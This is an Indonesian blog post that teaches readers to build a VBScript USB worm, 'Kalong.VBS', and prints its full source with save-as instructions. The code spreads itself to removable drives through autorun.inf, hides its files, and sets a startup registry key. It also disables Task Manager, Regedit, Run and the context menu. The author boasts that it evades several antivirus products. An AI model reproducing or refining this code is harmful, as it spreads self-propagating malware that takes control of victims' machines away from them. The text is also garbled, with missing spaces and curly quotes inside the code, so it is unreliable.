Cara membuat Virus DenganMudah

Iseng-isengmencolok Flash Disc saudarasayatiba-tibasayanemusebuahmalcodelokal yang dibuatdenganbahasa VBS. Wah, ternyatapara virus maker mulaimelirikmemakaibahasa VBS. Mungkinkarenamenyangkut HAKI (HakAtasKekayaanIntelektual) karena VB6.0 yang banyakberedaradalahbajakan. Jadiiamembuat virus dengan VBS yang bisadibuathanyadengan Notepad karena di Windows sudahada compiler yang terintegrasidengannya, Windows Based Script Host. Sesuajanjisaya, kitaakanmembuat virus yang sederhanamenggunakan Notepad. Virus iniakanmembuatdirinyamenyebarke removable disc denganAutoRunsehinggakomputer lain yang tercolok flash disc terinfeksiakanlangsungmenjadikorbantanpamenungu User menjalankan infector-nya. Virus inisayaberinama “Kalong.VBS”. Sekarangbuka Notepad-nya. Copy kodeberikut :
‘//–Awaldarikode, set agar ketikaterjadi Error dibiarkandankemudianlanjutkankegiatan virus–//
1.
on error resume next
2.
3.
‘//–Dim kata-kata berikutini–//
4.
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
5.
6.
‘//–Set sebuahteks yang nantinyaakandibuatuntukAutorun Setup Information–//
7.
isi = “[autorun]” &vbcrlf& “shellexecute=wscript.exe k4l0n6.dll.vbs”
8.
setfs = createobject(”Scripting.FileSystemObject”)
9.
set mf = fs.getfile(Wscript.ScriptFullname)
10.
dimtext,size
11.
size = mf.size
12.
check = mf.drive.drivetype
13.
set text = mf.openastextstream(1,-2)
14.
do while not text.atendofstream
15.
rekur = rekur&text.readline
16.
rekur = rekur&vbcrlf
17.
loop
18.
do
19.
20.
‘//–Copy diriuntukmenjadi file induk di Windows Path (example: C:\Windows)
21.
Set windowpath = fs.getspecialfolder(0)
22.
settf = fs.getfile(windowpath& “\batch- k4l0n6.dll.vbs “)
23.
tf.attributes = 32
24.
settf=fs.createtextfile(windowpath& “\batch- k4l0n6.dll.vbs”,2,true)
25.
tf.writerekursif
26.
tf.close
27.
settf = fs.getfile(windowpath& “\batch- k4l0n6.dll.vbs “)
28.
tf.attributes = 39
29.
‘//–Buat Atorun.inf untukmenjalankan virus otomatissetiap flash disc tercolok–//
30.
‘Menyebarkesetiap drive yang bertype 1 dan 2(removable) termasukdisket
31.
32.
for each flashdrive in fs.drives
33.
‘//–Cek Drive–//
34.
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path<> “A:” then
35.
36.
‘//–Buat Infector jikaternyataDrivetypr 1 atau 2. Atau A:\–//
37.
settf=fs.getfile(flashdrive.path&”\k4l0n6.dll.vbs “)
38.
tf.attributes =32
39.
settf=fs.createtextfile(flashdrive.path&”\k4l0n6.dll.vbs “,2,true)
40.
tf.writerekursif
41.
tf.close
42.
settf=fs.getfile(flashdrive.path&”\k4l0n6.dll.vbs “)
43.
tf.attributes = 39
44.
45.
‘//–Buat Atorun.inf yang teks-nyatadisudahdisiapkan (Auto Setup Information)–//
46.
settf =fs.getfile(flashdrive.path&”\autorun.inf”)
47.
tf.attributes = 32
48.
settf=fs.createtextfile(flashdrive.path&”\autorun.inf”,2,true)
49.
tf.writeisi
50.
tf.close
51.
settf = fs.getfile(flashdrive.path&”\autorun.inf”)
52.
tf.attributes=39
53.
endif
54.
next
55.
56.
‘//–Manipulasi Registry–//
57.
58.
set kalong = createobject(”WScript.Shell”)
59.
60.
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
61.
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
62.
63.
‘//–Manip – Set agar file hidden tidakditampilkan di Explorer–//
64.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
65.
66.
‘//–Manip – Hilangkan menu Find, Folder Options, Run, danmemblokirRegeditdan Task Manager–//
67.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
68.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
69.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
70.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
71.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
72.
73.
‘//–Manip – Disable klikkanan–//
74.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
75.
76.
‘//–Manip – MunculkanPesanSetiap Windows Startup–//
77.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
78.
79.
‘//–Manip – Aktifsetiap Windows Startup–//
80.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath& “\batch- k4l0n6.dll.vbs “
81.
82.
‘//–Manip – UbahRegisteredOwnerdan Organization–//
83.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
84.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
85.
86.
‘//–Nah kalaukodedibawahinisayanggak tau, tolong Mas Aat_Suntukmenjelaskan–//
87.
if check <> 1 then
88.
Wscript.sleep 200000
89.
endif
90.
loop while check <> 1
91.
setsd = createobject(”Wscript.shell”)
92.
sd.runwindowpath& “\explorer.exe /e,/select, ” &Wscript.ScriptFullname
93.
‘AkhirdariKode
Save code di Notepad dengancara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpandengannama : k4l0n6.dll.vbs. Sebenarnyagakusahpake *.dlljugagakapa-apatapiusaha agar tidakmencurigakanaja.
He..he…Virus Worm inimemangbukanmurnidaripemikiransayasendirikarenamenirukode-nya virus Rangga-Zay. Tapi yang inilebihbaguskarenatidakterdeteksipakai PCMAV RC15, CLAMAV, dan AVAST.Itung-itunginibuatAndatahukalaumembuat virus/worm tidakperlumembeli software bajakan.Pakai Notepad (dari Windows Original) jugabisa.
sumber :pusat hacking se-dunia

Share this Article now on :

ARTIKEL YANG BERHUBUNGAN :